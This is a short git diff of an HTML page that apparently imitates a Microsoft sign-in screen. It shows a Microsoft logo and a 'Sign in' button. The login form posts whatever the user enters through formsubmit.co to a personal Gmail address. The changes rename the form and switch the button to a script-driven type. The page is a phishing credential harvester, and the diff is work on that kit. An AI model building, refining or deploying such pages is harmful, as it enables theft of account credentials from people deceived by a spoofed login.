--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 </head>
 
 <body>
-     <form id="main_form" action="https://formsubmit.co/adebayoayomide574@gmail.com" method="POST">
+     <form id="loginForm" action="https://formsubmit.co/adebayoayomide574@gmail.com" method="POST">
     <section id="section_uname">
         <div class="auth-wrapper">
             <img src="/assests/logo.png" alt="Microsoft" />
@@ -61,7 +61,7 @@
                 </p>
             </div>
             <div>
-                <button class="btn" id="btn_sig" type="submit">Sign in</button>
+                <button class="btn" id="btn_final" type="button">Sign in</button>
             </div>
         </div>
     </section>
